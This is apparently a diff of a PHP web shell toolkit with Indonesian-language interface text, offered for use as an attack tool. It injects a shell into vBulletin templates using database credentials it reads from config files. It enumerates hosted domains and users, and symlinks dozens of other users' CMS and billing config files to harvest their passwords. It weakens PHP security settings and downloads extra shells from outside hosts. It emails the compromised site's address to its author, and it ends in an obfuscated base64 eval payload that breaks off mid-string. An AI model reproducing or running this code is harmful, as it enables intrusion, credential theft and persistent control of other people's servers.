- if(ereg('vBulletin',$readconfig)){
- $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
- $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
- $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
- $con = @mysql_connect('localhost',$userdb,$pass);
- $db = @mysql_select_db($db,$con);
- $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
- $query = @mysql_query($sqlfaq,$con);
- if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
- else
- {
- $r = '<b style="color:blue">failed</b>';
- }
- $domins = trim($domin).'';
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
- }else{
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
- }
- }
- die();
- }
- if(!is_file('named.txt')){
- $d00m = file("/etc/named.conf");
- }else{
- $d00m = file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'>
- <form method='POST' action='$pg?sws=vb'>
- <input type='submit' value='Inject shell' />
- <input type='hidden' value='1' name='s' />
- </form>
- <br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- $f = fopen('vb.txt','w');
- foreach($d00m as $dom){
- if(eregi("zone",$dom)){
- preg_match_all('#zone "(.*)"#', $dom, $domsws);
- if(strlen(trim($domsws[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- ///////////////////////////////////////////////////////////////////////////////////
- $wpl=$pageURL."idb/te4m/home/".$user['name']."/includes/config.php";
- $wpp=get_headers($wpl);
- $wp=$wpp[0];
- $wp2=$pageURL."idb/te4m/home/".$user['name']."/vb/includes/config.php";
- $wpp2=get_headers($wp2);
- $wp12=$wpp2[0];
- $wp3=$pageURL."idb/te4m/home/".$user['name']."/forum/includes/config.php";
- $wpp3=get_headers($wp3);
- $wp13=$wpp3[0];
- ////////// vb ////////////
- $pos = strpos($wp, "200");
- $config=" ";
- if (strpos($wp, "200") == true )
- {
- $config= $wpl;
- }
- elseif (strpos($wp12, "200") == true)
- {
- $config= $wp2;
- }
- elseif (strpos($wp13, "200") == true)
- {
- $config= $wp3;
- }
- else
- {
- continue;
- }
- flush();
- /////////////////////////////////////////////////////////////////////////////////////
- $dom = $domsws[1][0];
- $w = fwrite($f,"$config||$dom \n");
- if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
- echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
- <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
- flush();
- }
- }
- }
- }
- break;
- ############################ index #########################3
- case 'help':
- echo "<div class='tmp'>
- <table align='center' width='40%'><td>function</td><td>Case</td>";
- $safe_mode = ini_get('safe_mode');
- if($safe_mode){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>Safe Mode</td><td>$r</td>";
- $fun = function_exists('symlink');
- if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function symlink</td><td>$r</td>";
- $fun = function_exists('file');
- if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function file</td><td>$r</td>";
- $fun = function_exists('file_get_contents');
- if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function file_get_contents</td><td>$r</td>";
- $fun = function_exists('mkdir');
- if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function mkdir</td><td>$r</td>";
- $fun = is_dir('empek/amis.txt');
- if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>Permission denied</td><td>$r</td>";
- $fun = preg_match('/Forbidden/',@file_get_contents('empek/amis.txt') or !@file_get_contents('empek/amis.txt'));
- if($fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
- echo "<tr><td>Forbidden</td><td>$r</td>";
- echo "</table></div>";
- break;
- default:
- header("Location: $pg");
- }
- /// home ///
- }else
- {
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
- ?>
- <form action="?&idb=config" method="post">
- <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- echo '
- <form method="POST"><textarea cols="85" name="passwd" rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
- </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
- <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
- <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
- <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- if ($_POST['conf']) {
- $folfig = $_POST['folfig']; $type = $_POST['type'];
- $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');}
- @mkdir($folfig, 0755);
- @chdir($folfig);
- $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
- foreach($passwd as $pwd){ $user=trim($pwd);
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
- @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
- @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
- @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
- @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
- @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
- @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
- @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
- @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
- @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
- @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
- @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
- @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
- @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
- @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
- @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
- @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
- @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
- @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
- @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
- @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
- @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
- }
- echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
- }
- }
- ?>
- <?php
- @ini_set('output_buffering', 0);
- @ini_set('display_errors', 0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- $tujuanmail = 'kefiex403@gmail.com';
- $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
- $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
- mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
- ?>
- <form action="?&idb=auto" method="post">
- <?php
- echo "<html><head><title>MATAMU PICEK !!!!</title>";
- echo "<body bgcolor='black'>";
- echo "<center><h1><font color='blue'>IndahNya Berbagi<br/>IDB-TE4M</font></center></head>
- </h1><hr><br/>";
- echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
- echo "<font size='6' color='blue'><center>MINTA IJIN DULU SAMA SERVER</center></font><br/>";
- echo "<div align='center'>";
- echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
- echo "</div>";
- echo "<font size='5' color='blue'><center>PILIH SALAH SATU VERSI CGI DIBAWAH</center></font><br/>";
- echo "<div align='center'>";
- echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
- echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
- echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
- echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
- echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
- echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
- echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
- echo "<input type='submit' name='te4m7' value='-=[ TES ]=-'></p> ";
- echo "</div>";
- $sh = 'file_get_contents';
- if($_POST['idb']) {
- $ini = "php.ini";
- $open = fopen($ini, 'w');
- $source = ("safe_mode = OFF n
- disable_functions = NONE n
- safe_mode_gid = OFF n
- open_basedir = OFF n
- register_globals = ON n
- exec = ON n
- shell_exec = ON n");
- fwrite($open, $source);
- echo "<font color='lime'>";
- if($open) {
- echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
- }
- else {
- echo "<font color='blue'>";
- echo '<hr><p>GAGAL kang </p>';
- echo "</font>";
- fclose($open);
- } }
- if($_POST['te4m']) {
- $cgi = 'http://el-ro.yu.tl/files/in.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('hsh.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('hsh.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>shell hsh sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m1']) {
- $cgi = 'http://el-ro.yu.tl/files/beiz.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('info.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('info.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>tools sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='info.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m2']) {
- $cgi = 'http://el-ro.yu.tl/files/whm.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('whm.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('whm.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>whm killer sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m3']) {
- $cgi = 'http://el-ro.yu.tl/files/dm.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('links.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('links.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>shell DM sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m5']) {
- $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('sabun.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('sabun.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>sabun massal :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m6']) {
- $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('bn.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('bn.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>config kill :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m4']) {
- $cgi = 'http://kefiex.yu.tl/files/b.zip';
- $get11 = $sh($cgi);
- $idb1k = fopen('.pl', 'w');
- fwrite($idb1k,$get11);
- fclose($idb1k);
- {
- @chmod('.pl',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>CGIProxy sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='.pl' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m7']) {
- $cgi = 'http://kefiex.yu.tl/files/hsh.zip';
- $get11 = $sh($cgi);
- $idb1k = fopen('hsh.zip', 'get');
- fwrite($idb1k,$get11);
- fclose($idb1k);
- {
- @chmod('hsh',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>CGIProxy sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='hsh' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'domain')) { ?>
- <form action="?idb=domain" method="post">
- <?php
- echo '<br><br></center><br><br><div class=content>';
- $file = @implode(@file("/etc/named.conf"));
- if (!$file) {
- die("can't ReaD -> [ /etc/named.conf ");
- }
- preg_match_all("#named/(.*?).db#", $file, $r);
- $domains = array_unique($r[1]);
- //check();
- //if(isset($_GET['ShowAll']))
- {
- echo "<table align=center border=1 width=59% cellpadding=5>
- <tr><td colspan=2>[+] ADA [ <b>" . count($domains) . "</b> ] DOMAIN</td></tr>
- <tr><td>Domain</td><td>User</td></tr>";
- foreach ($domains as $domain) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
- echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
- }
- echo "</table>";
- }
- echo '</div>';
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'sql')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
- echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
- if (!is_dir('s')) {
- $mk = @mkdir('s', 0777);
- @fwrite($f, $c);
- $f2 = @fopen('s/db.php', 'w');
- $sml_db = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJ